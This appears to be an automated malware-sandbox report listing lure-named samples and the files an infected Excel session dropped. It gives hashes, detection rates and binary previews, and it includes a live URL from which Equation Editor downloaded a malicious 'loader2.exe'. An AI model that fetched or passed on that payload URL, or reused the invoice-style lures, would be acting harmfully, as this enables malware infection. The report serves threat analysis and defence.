                                                                                                                                                                    PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsxGet hashmaliciousBrowse
                                                                                                                                                                      Purchase Order Price List 061021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                        Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                                                                                                          UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                                                                                                                                                            Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                                                                                                              3arZKnr21W.exeGet hashmaliciousBrowse
                                                                                                                                                                                Shipping receipt.exeGet hashmaliciousBrowse
                                                                                                                                                                                  New Order TL273723734533.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    YZ8OvkljWm.exeGet hashmaliciousBrowse
                                                                                                                                                                                      U03c2doc.exeGet hashmaliciousBrowse
                                                                                                                                                                                        QUOTE061021.exeGet hashmaliciousBrowse

                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe
                                                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):224710
                                                                                                                                                                                          Entropy (8bit):7.912728398567341
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:Ds9p+npLadPGnTF8SnI8ey8uLSJB6+i940vqC7J:yptdenTiSnI8ethi9aaJ
                                                                                                                                                                                          MD5:8C35AC8D43F7E59105902FA16114144E
                                                                                                                                                                                          SHA1:C1A0E5DE1121E55C22649182C923B41EFD4E2848
                                                                                                                                                                                          SHA-256:1A08FC838C4EBAB6B986B6010E2074A05C29916CD38096E7F7D26A6455917508
                                                                                                                                                                                          SHA-512:F89DA0804389F71E3627B9BCC5299D6EAAB0649197D1084FB3B6F63E4BD126BAF333C9781AA02C3666AC59E79CB645487CFDBE19061B1C5119098529BFBD7F18
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                          • Antivirus: Metadefender, Detection: 23%, Browse
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 41%
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          IE Cache URL:http://192.210.173.40/files/loader2.exe
                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\109F14E4.png
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):50311
                                                                                                                                                                                          Entropy (8bit):7.960958863022709
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                                                                                                                                          MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                                                                                                                                          SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                                                                                                                                          SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                                                                                                                                          SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                          Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\277819E7.jpeg
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):8815
                                                                                                                                                                                          Entropy (8bit):7.944898651451431
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                                                                                                                          MD5:F06432656347B7042C803FE58F4043E1
                                                                                                                                                                                          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                                                                                                                          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                                                                                                                          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B5D57E6.png
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):49744
                                                                                                                                                                                          Entropy (8bit):7.99056926749243
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                                                                                                                          MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                                                                                                                          SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                                                                                                                          SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                                                                                                                          SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                          Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32802092.png
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):79394
                                                                                                                                                                                          Entropy (8bit):7.864111100215953
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                                                          MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                                                          SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                                                          SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                                                          SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                          Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\44AAE795.jpeg
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):8815
                                                                                                                                                                                          Entropy (8bit):7.944898651451431
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                                                                                                                          MD5:F06432656347B7042C803FE58F4043E1
                                                                                                                                                                                          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                                                                                                                          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                                                                                                                          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62FA5ABC.png
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):79394
                                                                                                                                                                                          Entropy (8bit):7.864111100215953
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                                                          MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                                                          SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                                                          SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                                                          SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8592FDFE.png
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):50311
                                                                                                                                                                                          Entropy (8bit):7.960958863022709
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                                                                                                                                          MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                                                                                                                                          SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                                                                                                                                          SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                                                                                                                                          SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\936B5B39.emf
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):7608
                                                                                                                                                                                          Entropy (8bit):5.091127811854214
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
                                                                                                                                                                                          MD5:EB06F07412A815AED391F20298C1087B
                                                                                                                                                                                          SHA1:AC0601FFC173F50B56C3AE2265C61B76711FBE01
                                                                                                                                                                                          SHA-256:5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
                                                                                                                                                                                          SHA-512:38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I....................................................v.Ze..............%f^..................Y...Y.'.wq....\.....Y.......Y.@.Y.W.wq......Y..6.v_.wq......wq.Ze.4.g^..Y...f^0.g^......g^..f^........4.g^@.Y...f^......f^..........g^..Y.......g^4tf^..g^............<..u.Z.v.....Ze......Ze........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\94CC6BB1.png
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):84203
                                                                                                                                                                                          Entropy (8bit):7.979766688932294
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                                                                                                                                          MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                                                                                                                                          SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                                                                                                                                          SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                                                                                                                                          SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0535E70.png
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):49744
                                                                                                                                                                                          Entropy (8bit):7.99056926749243
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                                                                                                                          MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                                                                                                                          SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                                                                                                                          SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                                                                                                                          SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A339838D.png
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):51166
                                                                                                                                                                                          Entropy (8bit):7.767050944061069
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                                                                                                                                          MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                                                                                                                                          SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                                                                                                                                          SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                                                                                                                                          SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9F87218.emf
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):648132
                                                                                                                                                                                          Entropy (8bit):2.8124530118203914
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                                                                                                                                                                                          MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                                                                                                                                                                                          SHA1:F677467423105ACF39B76CB366F08152527052B3
                                                                                                                                                                                          SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
